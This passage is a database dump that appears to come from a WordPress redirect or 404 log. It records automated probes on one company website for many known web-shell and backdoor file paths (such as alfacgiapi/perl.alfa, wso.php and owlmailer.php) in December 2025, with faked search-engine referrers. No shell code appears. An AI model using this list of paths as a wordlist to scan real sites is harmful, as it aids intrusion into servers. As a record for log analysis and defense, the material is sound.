00:00:00',301),(50881,'http://3s-technologies.com.tr/en/wp-admin/js/chosen.php',NULL,'https://www.yahoo.com/','',10,0,'2025-12-20 04:37:04','0000-00-00 00:00:00',301),(50882,'http://3s-technologies.com.tr/en/wp-admin/maint/chosen.php',NULL,'https://www.yahoo.com/','',7,0,'2025-12-20 04:37:05','0000-00-00 00:00:00',301),(50883,'http://3s-technologies.com.tr/en/wp-admin/network/chosen.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:37:06','0000-00-00 00:00:00',301),(50884,'http://3s-technologies.com.tr/en/wp-admin/user/chosen.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:37:06','0000-00-00 00:00:00',301),(50885,'http://3s-technologies.com.tr/en/wp-content/plugins/chosen.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:37:09','0000-00-00 00:00:00',301),(50886,'http://3s-technologies.com.tr/en/wp-content/languages/chosen.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:37:10','0000-00-00 00:00:00',301),(50887,'http://3s-technologies.com.tr/en/wp-content/languages/themes/chosen.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:37:11','0000-00-00 00:00:00',301),(50888,'http://3s-technologies.com.tr/en/index/chosen.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:37:15','0000-00-00 00:00:00',301),(50889,'http://3s-technologies.com.tr/en/about/chosen.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:37:16','0000-00-00 00:00:00',301),(50890,'http://3s-technologies.com.tr/en/as/chosen.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:37:16','0000-00-00 00:00:00',301),(50891,'http://3s-technologies.com.tr/en/file/chosen.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:37:17','0000-00-00 00:00:00',301),(50892,'http://3s-technologies.com.tr/en/chosen/chosen.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:37:18','0000-00-00 00:00:00',301),(50893,'http://3s-technologies.com.tr/en/css/chosen.php',NULL,'https://duckduckgo.com/','',4,0,'2025-12-20 04:37:19','0000-00-00 00:00:00',301),(50894,'http://3s-technologies.com.tr/en/nice.php?p=',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:37:20','0000-00-00 00:00:00',301),(50895,'http://3s-technologies.com.tr/en/uploads/upload_example.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:37:22','0000-00-00 00:00:00',301),(50896,'http://3s-technologies.com.tr/en/wp-ahsera.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:37:26','0000-00-00 00:00:00',301),(50897,'http://3s-technologies.com.tr/en/wp-easy.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:37:27','0000-00-00 00:00:00',301),(50898,'http://3s-technologies.com.tr/en/class-wp-http-requests-hooks.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:37:30','0000-00-00 00:00:00',301),(50899,'http://3s-technologies.com.tr/en/class-envato-market-api.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:37:33','0000-00-00 00:00:00',301),(50900,'http://3s-technologies.com.tr/en/alfa-ioxi.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:37:34','0000-00-00 00:00:00',301),(50901,'http://3s-technologies.com.tr/en/wp1.php',NULL,'https://www.google.de/','',21,0,'2025-12-20 04:37:34','0000-00-00 00:00:00',301),(50902,'http://3s-technologies.com.tr/en/wp3.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:37:37','0000-00-00 00:00:00',301),(50903,'http://3s-technologies.com.tr/en/wp4.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:37:38','0000-00-00 00:00:00',301),(50904,'http://3s-technologies.com.tr/en/wp5.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:37:39','0000-00-00 00:00:00',301),(50905,'http://3s-technologies.com.tr/en/wp-23.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:37:40','0000-00-00 00:00:00',301),(50906,'http://3s-technologies.com.tr/en/wp-adminincludesclass-wp-media-list-data.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:37:47','0000-00-00 00:00:00',301),(50907,'http://3s-technologies.com.tr/en/imagesvuln.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:38:09','0000-00-00 00:00:00',301),(50908,'http://3s-technologies.com.tr/en/wp-admin/options.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:38:10','0000-00-00 00:00:00',301),(50909,'http://3s-technologies.com.tr/en/wp-admin/maint/atomlib.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:38:54','0000-00-00 00:00:00',301),(50910,'http://3s-technologies.com.tr/en/wp-includes/css/dist/niil.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:39:23','0000-00-00 00:00:00',301),(50911,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core/curve25519-items.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:39:24','0000-00-00 00:00:00',301),(50912,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/about.php',NULL,'https://www.google.fr/','',6,0,'2025-12-20 04:39:42','0000-00-00 00:00:00',301),(50913,'http://3s-technologies.com.tr/en/sad/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:39:45','0000-00-00 00:00:00',301),(50914,'http://3s-technologies.com.tr/en/.well-known/alfa_data/alfacgiapi/perl.alfa',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:40:00','0000-00-00 00:00:00',301),(50915,'http://3s-technologies.com.tr/en/tmp_images/alfacgiapi/perl.alfa',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:40:01','0000-00-00 00:00:00',301),(50916,'http://3s-technologies.com.tr/en/wp-admin/alfacgiapi/perl.alfa',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:40:02','0000-00-00 00:00:00',301),(50917,'http://3s-technologies.com.tr/en/wp-content/alfacgiapi/perl.alfa',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:40:03','0000-00-00 00:00:00',301),(50918,'http://3s-technologies.com.tr/en/wp-includes/alfacgiapi/perl.alfa',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:40:04','0000-00-00 00:00:00',301),(50919,'http://3s-technologies.com.tr/en/alfacgiapi/perl.alfa',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:40:05','0000-00-00 00:00:00',301),(50920,'http://3s-technologies.com.tr/en/css/alfa_data/alfacgiapi/perl.alfa',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:40:06','0000-00-00 00:00:00',301),(50921,'http://3s-technologies.com.tr/en/files/alfa_data/alfacgiapi/perl.alfa',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:40:07','0000-00-00 00:00:00',301),(50922,'http://3s-technologies.com.tr/en/images/alfa_data/alfacgiapi/perl.alfa',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:40:08','0000-00-00 00:00:00',301),(50923,'http://3s-technologies.com.tr/en/alfa_data/alfacgiapi/perl.alfa\"',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:40:09','0000-00-00 00:00:00',301),(50924,'http://3s-technologies.com.tr/en/wp-admin/alfa_data/alfacgiapi/perl.alfa',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:40:09','0000-00-00 00:00:00',301),(50925,'http://3s-technologies.com.tr/en/wp-content/alfa_data/alfacgiapi/perl.alfa',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:40:10','0000-00-00 00:00:00',301),(50926,'http://3s-technologies.com.tr/en/pomo.php',NULL,'https://www.google.co.uk/','',3,0,'2025-12-20 04:40:14','0000-00-00 00:00:00',301),(50927,'http://3s-technologies.com.tr/en/wp-admin/images/pomo.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:40:15','0000-00-00 00:00:00',301),(50928,'http://3s-technologies.com.tr/en/wp-admin/includes/pomo.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:40:15','0000-00-00 00:00:00',301),(50929,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/pomo.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:40:16','0000-00-00 00:00:00',301),(50930,'http://3s-technologies.com.tr/en/wp-admin/js/pomo.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:40:17','0000-00-00 00:00:00',301),(50931,'http://3s-technologies.com.tr/en/wp-admin/maint/pomo.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:40:18','0000-00-00 00:00:00',301),(50932,'http://3s-technologies.com.tr/en/wp-admin/network/pomo.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:40:19','0000-00-00 00:00:00',301),(50933,'http://3s-technologies.com.tr/en/wp-admin/user/pomo.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:40:20','0000-00-00 00:00:00',301),(50934,'http://3s-technologies.com.tr/en/wp-content/pomo.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:40:21','0000-00-00 00:00:00',301),(50935,'http://3s-technologies.com.tr/en/wp-content/uploads/pomo.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:40:21','0000-00-00 00:00:00',301),(50936,'http://3s-technologies.com.tr/en/wp-content/plugins/pomo.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:40:22','0000-00-00 00:00:00',301),(50937,'http://3s-technologies.com.tr/en/wp-content/languages/pomo.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:40:23','0000-00-00 00:00:00',301),(50938,'http://3s-technologies.com.tr/en/wp-content/languages/themes/pomo.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:40:24','0000-00-00 00:00:00',301),(50939,'http://3s-technologies.com.tr/en/wp-includes/simplepie/pomo.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:40:25','0000-00-00 00:00:00',301),(50940,'http://3s-technologies.com.tr/en/wp-includes/certificates/pomo.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:40:26','0000-00-00 00:00:00',301),(50941,'http://3s-technologies.com.tr/en/wp-includes/customize/pomo.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:40:27','0000-00-00 00:00:00',301),(50942,'http://3s-technologies.com.tr/en/index/pomo.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:40:28','0000-00-00 00:00:00',301),(50943,'http://3s-technologies.com.tr/en/about/pomo.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:40:28','0000-00-00 00:00:00',301),(50944,'http://3s-technologies.com.tr/en/as/pomo.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:40:29','0000-00-00 00:00:00',301),(50945,'http://3s-technologies.com.tr/en/file/pomo.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:40:30','0000-00-00 00:00:00',301),(50946,'http://3s-technologies.com.tr/en/chosen/pomo.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:40:31','0000-00-00 00:00:00',301),(50947,'http://3s-technologies.com.tr/en/sell.php7',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:40:34','0000-00-00 00:00:00',301),(50948,'http://3s-technologies.com.tr/en/wp-admin/sell.php7',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:40:35','0000-00-00 00:00:00',301),(50949,'http://3s-technologies.com.tr/en/wp-content/sell.php7',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:40:36','0000-00-00 00:00:00',301),(50950,'http://3s-technologies.com.tr/en/wp-content/uploads/sell.php7',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:40:37','0000-00-00 00:00:00',301),(50951,'http://3s-technologies.com.tr/en/images/sell.php7',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:40:38','0000-00-00 00:00:00',301),(50952,'http://3s-technologies.com.tr/en/wp-logout.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:40:39','0000-00-00 00:00:00',301),(50953,'http://3s-technologies.com.tr/en/wp-admin/wp-logout.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:40:40','0000-00-00 00:00:00',301),(50954,'http://3s-technologies.com.tr/en/wp-content/themes/wp-logout.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:40:41','0000-00-00 00:00:00',301),(50955,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-logout.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:40:42','0000-00-00 00:00:00',301),(50956,'http://3s-technologies.com.tr/en/wp-admin/images/wp-logout.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:40:43','0000-00-00 00:00:00',301),(50957,'http://3s-technologies.com.tr/en/wp-24.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:40:44','0000-00-00 00:00:00',301),(50958,'http://3s-technologies.com.tr/en/wp-content/plugins/shell/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:40:47','0000-00-00 00:00:00',301),(50959,'http://3s-technologies.com.tr/en/wp-content/plugins/root-file-manager/wp-file.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:40:48','0000-00-00 00:00:00',301),(50960,'http://3s-technologies.com.tr/en/wp-content/plugins/ph-file-manager/wp-file.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:40:49','0000-00-00 00:00:00',301),(50961,'http://3s-technologies.com.tr/en/images/sfm.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:40:52','0000-00-00 00:00:00',301),(50962,'http://3s-technologies.com.tr/en/wp-admin/css/sidebarh.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:40:53','0000-00-00 00:00:00',301),(50963,'http://3s-technologies.com.tr/en/wp-includes/blocks-other.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:40:54','0000-00-00 00:00:00',301),(50964,'http://3s-technologies.com.tr/en/.well-known/setting.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:40:54','0000-00-00 00:00:00',301),(50965,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/file.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:40:55','0000-00-00 00:00:00',301),(50966,'http://3s-technologies.com.tr/en/files/ban.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:40:56','0000-00-00 00:00:00',301),(50967,'http://3s-technologies.com.tr/en/wp-admin/css/wp-is.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:40:57','0000-00-00 00:00:00',301),(50968,'http://3s-technologies.com.tr/en/files/galeria.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:40:58','0000-00-00 00:00:00',301),(50969,'http://3s-technologies.com.tr/en/wp-content/languages/e-preview.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:40:59','0000-00-00 00:00:00',301),(50970,'http://3s-technologies.com.tr/en/files/setting.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:41:00','0000-00-00 00:00:00',301),(50971,'http://3s-technologies.com.tr/en/images/sendme.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:41:01','0000-00-00 00:00:00',301),(50972,'http://3s-technologies.com.tr/en/wp-includes/class-json-ajax-session.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:41:02','0000-00-00 00:00:00',301),(50973,'http://3s-technologies.com.tr/en/wp-content/languages/ru_ru.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:41:02','0000-00-00 00:00:00',301),(50974,'http://3s-technologies.com.tr/en/wp-admin/images/feeds.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:41:03','0000-00-00 00:00:00',301),(50975,'http://3s-technologies.com.tr/en/wp-admin/images/searchl.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:41:04','0000-00-00 00:00:00',301),(50976,'http://3s-technologies.com.tr/en/wp-content/blogs.dir/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:41:05','0000-00-00 00:00:00',301),(50977,'http://3s-technologies.com.tr/en/wp-includes/simplepie/about.php',NULL,'https://www.google.fr/','',10,0,'2025-12-20 04:41:09','0000-00-00 00:00:00',301),(50978,'http://3s-technologies.com.tr/en/wp-content/gallery/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:41:10','0000-00-00 00:00:00',301),(50979,'http://3s-technologies.com.tr/en/wp-includes/images/about.php',NULL,'https://www.bing.com/','',5,0,'2025-12-20 04:41:12','0000-00-00 00:00:00',301),(50980,'http://3s-technologies.com.tr/en/wp-includes/rest-api/about.ph',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:41:13','0000-00-00 00:00:00',301),(50981,'http://3s-technologies.com.tr/en/.well-known/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:41:17','0000-00-00 00:00:00',301),(50982,'http://3s-technologies.com.tr/en/cgi-bin/about.php',NULL,'https://www.google.co.uk/','',3,0,'2025-12-20 04:41:18','0000-00-00 00:00:00',301),(50983,'http://3s-technologies.com.tr/en/wp-includes/block-patterns/about.php',NULL,'https://www.google.de/','',5,0,'2025-12-20 04:41:22','0000-00-00 00:00:00',301),(50984,'http://3s-technologies.com.tr/en/wp-content/updraft/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:41:25','0000-00-00 00:00:00',301),(50985,'http://3s-technologies.com.tr/en/wp-content/upgrade-temp-backup/about.php',NULL,'https://www.google.co.uk/','',3,0,'2025-12-20 04:41:26','0000-00-00 00:00:00',301),(50986,'http://3s-technologies.com.tr/en/wp-includes/ixr/about.php',NULL,'https://www.bing.com/','',5,0,'2025-12-20 04:41:27','0000-00-00 00:00:00',301),(50987,'http://3s-technologies.com.tr/en/wp-includes/widgets/about.php',NULL,'https://www.google.de/','',5,0,'2025-12-20 04:41:30','0000-00-00 00:00:00',301),(50988,'http://3s-technologies.com.tr/en/img/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:41:31','0000-00-00 00:00:00',301),(50989,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/nice.php?p=',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:41:32','0000-00-00 00:00:00',301),(50990,'http://3s-technologies.com.tr/en/wp-admin/network/nice.php?p=',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:41:33','0000-00-00 00:00:00',301),(50991,'http://3s-technologies.com.tr/en/cgi-bin/nice.php?p=',NULL,'https://www.bing.com/','',1,0,'2025-12-20 04:41:34','0000-00-00 00:00:00',301),(50992,'http://3s-technologies.com.tr/en/css/nice.php?p=',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:41:35','0000-00-00 00:00:00',301),(50993,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/nice.php?p=',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:41:36','0000-00-00 00:00:00',301),(50994,'http://3s-technologies.com.tr/en/wp-admin/images/nice.php?p=',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:41:37','0000-00-00 00:00:00',301),(50995,'http://3s-technologies.com.tr/en/images/nice.php?p=',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:41:37','0000-00-00 00:00:00',301),(50996,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/nice.php?p=',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:41:38','0000-00-00 00:00:00',301),(50997,'http://3s-technologies.com.tr/en/wp-admin/css/colors/nice.php?p=',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:41:39','0000-00-00 00:00:00',301),(50998,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/nice.php?p=',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:41:40','0000-00-00 00:00:00',301),(50999,'http://3s-technologies.com.tr/en/wp-admin/includes/nice.php?p=',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:41:41','0000-00-00 00:00:00',301),(51000,'http://3s-technologies.com.tr/en/wp-includes.bak/html-api/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:41:43','0000-00-00 00:00:00',301),(51001,'http://3s-technologies.com.tr/en/wp-includes/lf.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:41:44','0000-00-00 00:00:00',301),(51002,'http://3s-technologies.com.tr/en/mailer2.8.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:41:45','0000-00-00 00:00:00',301),(51003,'http://3s-technologies.com.tr/en/jp.php',NULL,'https://www.google.com/','',8,0,'2025-12-20 04:41:46','0000-00-00 00:00:00',301),(51004,'http://3s-technologies.com.tr/en/wp-abupee.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:41:50','0000-00-00 00:00:00',301),(51005,'http://3s-technologies.com.tr/en/wp-content/wp-abupee.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:41:50','0000-00-00 00:00:00',301),(51006,'http://3s-technologies.com.tr/en/wp-admin/wp-abupee.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:41:51','0000-00-00 00:00:00',301),(51007,'http://3s-technologies.com.tr/en/wp-admin/includes/wp-abupee.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:41:52','0000-00-00 00:00:00',301),(51008,'http://3s-technologies.com.tr/en/wp-content/themes/wp-abupee.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:41:53','0000-00-00 00:00:00',301),(51009,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/wp-abupee.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:41:54','0000-00-00 00:00:00',301),(51010,'http://3s-technologies.com.tr/en/wp-admin/css/colors/wp-abupee.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:41:55','0000-00-00 00:00:00',301),(51011,'http://3s-technologies.com.tr/en/wp-admin/css/wp-abupee.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:41:56','0000-00-00 00:00:00',301),(51012,'http://3s-technologies.com.tr/en/wp-admin/maint/wp-abupee.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:41:57','0000-00-00 00:00:00',301),(51013,'http://3s-technologies.com.tr/en/.well-known/wp-abupee.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:41:58','0000-00-00 00:00:00',301),(51014,'http://3s-technologies.com.tr/en/images/wp-abupee.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:41:59','0000-00-00 00:00:00',301),(51015,'http://3s-technologies.com.tr/en/wp-includes/wp-abupee.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:42:00','0000-00-00 00:00:00',301),(51016,'http://3s-technologies.com.tr/en/wp-includes/css/wp-abupee.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:42:01','0000-00-00 00:00:00',301),(51017,'http://3s-technologies.com.tr/en/wp-admin/images/themes.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:42:06','0000-00-00 00:00:00',301),(51018,'http://3s-technologies.com.tr/en/wp-includes/js/themes.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:42:08','0000-00-00 00:00:00',301),(51019,'http://3s-technologies.com.tr/en/wp-includes/pomo/themes.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:42:09','0000-00-00 00:00:00',301),(51020,'http://3s-technologies.com.tr/en/wp-content/themes.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:42:10','0000-00-00 00:00:00',301),(51021,'http://3s-technologies.com.tr/en/wp-includes/css/themes.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:42:11','0000-00-00 00:00:00',301),(51022,'http://3s-technologies.com.tr/en/wp-admin/js/themes.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:42:12','0000-00-00 00:00:00',301),(51023,'http://3s-technologies.com.tr/en/wp-includes/rest-api/themes.phps',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:42:13','0000-00-00 00:00:00',301),(51024,'http://3s-technologies.com.tr/en/wp-admin/maint/themes.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:42:13','0000-00-00 00:00:00',301),(51025,'http://3s-technologies.com.tr/en/wp-includes/requests/themes.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:42:14','0000-00-00 00:00:00',301),(51026,'http://3s-technologies.com.tr/en/wp-content/fonts/themes.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:42:15','0000-00-00 00:00:00',301),(51027,'http://3s-technologies.com.tr/en/avaa.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:42:16','0000-00-00 00:00:00',301),(51028,'http://3s-technologies.com.tr/en/wp-admin/css/wp-login.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:42:18','0000-00-00 00:00:00',301),(51029,'http://3s-technologies.com.tr/en/wp-includes/test.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:42:22','0000-00-00 00:00:00',301),(51030,'http://3s-technologies.com.tr/en/admin/controller/extension/extension/up.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:42:22','0000-00-00 00:00:00',301),(51031,'http://3s-technologies.com.tr/en/wp-admin/css/colors/midnight/zsihhopn.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:42:23','0000-00-00 00:00:00',301),(51032,'http://3s-technologies.com.tr/en/files/mailer.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:42:24','0000-00-00 00:00:00',301),(51033,'http://3s-technologies.com.tr/en/uploads/owlmailer.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:42:25','0000-00-00 00:00:00',301),(51034,'http://3s-technologies.com.tr/en/owlmailer.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:42:26','0000-00-00 00:00:00',301),(51035,'http://3s-technologies.com.tr/en/qfjnelot.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:42:27','0000-00-00 00:00:00',301),(51036,'http://3s-technologies.com.tr/en/wp-admin/.lufix-983426.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:42:28','0000-00-00 00:00:00',301),(51037,'http://3s-technologies.com.tr/en/wp-admin/muplugin.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:42:29','0000-00-00 00:00:00',301),(51038,'http://3s-technologies.com.tr/en/wp-content/muplugin.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:42:30','0000-00-00 00:00:00',301),(51039,'http://3s-technologies.com.tr/en/wp-incleudes/muplugin.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:42:31','0000-00-00 00:00:00',301),(51040,'http://3s-technologies.com.tr/en/wp-admin/ex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:42:31','0000-00-00 00:00:00',301),(51041,'http://3s-technologies.com.tr/en/wp-content/ex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:42:32','0000-00-00 00:00:00',301),(51042,'http://3s-technologies.com.tr/en/haxorsecv2.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:42:33','0000-00-00 00:00:00',301),(51043,'http://3s-technologies.com.tr/en/wp-admin/haxorsecv2.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:42:34','0000-00-00 00:00:00',301),(51044,'http://3s-technologies.com.tr/en/wp-content/haxorsecv2.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:42:35','0000-00-00 00:00:00',301),(51045,'http://3s-technologies.com.tr/en/wp-incleudes/haxorsecv2.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:42:36','0000-00-00 00:00:00',301),(51046,'http://3s-technologies.com.tr/en/images/qfjnelot.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:42:36','0000-00-00 00:00:00',301),(51047,'http://3s-technologies.com.tr/en/wp-admin/qfjnelot.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:42:37','0000-00-00 00:00:00',301),(51048,'http://3s-technologies.com.tr/en/wp-includes/qfjnelot.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:42:38','0000-00-00 00:00:00',301),(51049,'http://3s-technologies.com.tr/en/wp-content/qfjnelot.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:42:39','0000-00-00 00:00:00',301),(51050,'http://3s-technologies.com.tr/en/wp-admin/images/wp-login.php',NULL,'https://www.google.co.uk/','',3,0,'2025-12-20 04:42:40','0000-00-00 00:00:00',301),(51051,'http://3s-technologies.com.tr/en/wp-content/languages/wp-login.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:42:42','0000-00-00 00:00:00',301),(51052,'http://3s-technologies.com.tr/en/wp-content/plugins/envato-market/inc/class-envato-market-api.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:42:43','0000-00-00 00:00:00',301),(51053,'http://3s-technologies.com.tr/en/wp-content/plugins/wso.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:42:45','0000-00-00 00:00:00',301),(51054,'http://3s-technologies.com.tr/en/wp-content/languages/wp-conflg.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:42:51','0000-00-00 00:00:00',301),(51055,'http://3s-technologies.com.tr/en/wp-content/plugins/core/include.php',NULL,'https://www.google.fr/','',6,0,'2025-12-20 04:42:54','0000-00-00 00:00:00',301),(51056,'http://3s-technologies.com.tr/en/wp-includes/js/crop/index.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:42:58','0000-00-00 00:00:00',301),(51057,'http://3s-technologies.com.tr/en/.well-knownold/index.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:43:00','0000-00-00 